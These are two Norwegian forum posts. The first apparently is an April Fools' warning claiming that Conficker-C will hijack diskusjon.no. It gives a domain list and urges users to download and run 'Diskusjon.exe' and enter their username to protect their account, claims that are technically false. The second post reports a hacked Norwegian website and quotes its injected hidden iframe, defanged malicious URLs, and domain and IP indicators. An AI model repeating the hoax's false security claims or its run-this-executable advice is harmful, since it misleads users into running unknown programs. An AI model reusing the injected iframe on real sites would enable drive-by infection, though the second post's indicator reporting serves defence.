    Den mye omtalte Conficker-C ormen vil som kjent bli aktivert 1.april (se artikkel på bla hardware: http://www.hardware.no/artikler/ny_confick...s_1_april/68520. Denne ormen (som også finnes i en A og B-variant), har utvidet generering av domener fra 250 pr. dag til 50 000 pr. dag.
     
    Algoritmen som lager domenenavnene er kjent.
     
    Så langt har det vært få 'kjente' nettsteder som ormen har koblet seg til. Nå har dessverre diskusjon.no blitt en del av botnettet og ett av domenen som ormen aktiverer i løpet av 1.april:
     
    ....
    C, 01/04/2009, 0, muocf.com
    C, 01/04/2009, 1, slnsepl.info
    C, 01/04/2009, 2, hznvnbclb.ws
    C, 01/04/2009, 3, tgpdjdlk.info
    C, 01/04/2009, 4, diskusjon.no
    C, 01/04/2009, 5, dophzgto.se
    C, 01/04/2009, 6, snfzhmej.net
    C, 01/04/2009, 7, igcrfrqqud.com
    C, 01/04/2009, 8, dcvqntv.ws
    ....
    Lengre ned på lista finnes noen andre .no-domener:
     
    C, 01/04/2009, 1732, wow.no
    C, 01/04/2009, 23550, sas.no
    C, 01/04/2009, 37893, nav.no
     
     
    Ueland er klar over tilfellet og i samarbeid med sikkerhetseksperter (fra Milton Security) er det laget en beskyttelse som gjør at din bruker ikke vil bli berørt om ormen skulle spre seg i nettverket. Hvis beskyttelsen ikke kjøres, vil din pc stå i fare for å bli infisert via din bruker når du logger deg inn på forumet.
     
    Aktiveringen av ormen skjer kl. 15.00 norsk tid, 1.april. Alternativet er at man holder seg borte fra forumet mellom kl. 15 og 24, men beskyttelsen fungerer, så det skulle ikke være noe å vente med:
     
    1. Last ned zip-fila, pakk den ut på skrivebordet og kjør fila (Diskusjon.exe)
    2. Skriv inn brukernavnet ditt i programmet og klikk på Beskytt
    3. Brukernavnet ditt vil nå være beskyttet mot ormen slik at ormen ikke sprer seg videre.
     

     
    Hvis du fortsatt sitter med noen spørsmål rundt sikkerheten til forumet og din bruker, send en pm til Ueland eller Dotten som er de tekniske/ansvarlige for forumet.
     
    Som flere nettaviser har påpekt, er 1.april en litt uheldig dato for slike meldinger da de fleste vet at datoen blir brukt til aprilspøk. De som står bak ormen, har nok tatt dette med i betraktningen da de satte aktiveringsdatoen. Dette må tas alvorlig da denne ormen har utviklet seg til en 'epidemi' med over 10 millioner infiserte pc'er. Forumet har lagt ned store ressurser for å forhindre at brukerene blir infisert. Milton Security har i samarbeid med flere norske forum laget fixer der brukeridentene blir beskyttet mot dette.
  25. norbat
    Selv for en dyrevenn så er ikke alt som lukter hund, bra. Nettstedet 'hxxp://www.omplasseringavhunder.no' er fortiden infisert med malware som prøver å utnytte kjente sårbarheter knyttet til div. program.
     
    Javascript-injeksjonen, som er lagt inn på siden, henter info fra:
    <iframe id="1e321863e201f914ad22f7669a83199d" name="d9660710064c187e1f82343133ab4fe1" width=1
    height=1 frameborder=0 src="hxxp://thehugetitstop.cn/dontstop.html"></iframe>
     
    Via redirect :
    hxxp://vpsspeedin.ru/x/pdf.php -> henter en infisert .pdf-fil (adobe reader)
    hxxp://vpsspeedin.ru/x/load.php?id=x -> henter en TrojanDownloader, XPpoliceAntivirus
     
    Domener involvert:
    thehugetitstop.cn 91.212.65.33
    gianthighestfind.cn 91.212.65.33
    tozxiqud.cn 91.212.65.7
    vpsspeedin.ru 91.212.65.33
    ralcofic.cn 91.212.65.7
    8addition.info 210.48.154.132
     
    I tillegg er det tegn på at pc'n vil bli forsøkt inkl. i et botnet knyttet til epost-spam.
     
    Infeksjonen er vanlig og prøver å utnytte kjente sårbarheter knyttet til
    Flash Player
    Adobe Reader
    Office Snapshot Viewer
     
    Tiltak er å holde programmene (inkl antivirus) oppdatert. Benytt gjerne F-secure sin Health Check
×
×
  • Opprett ny...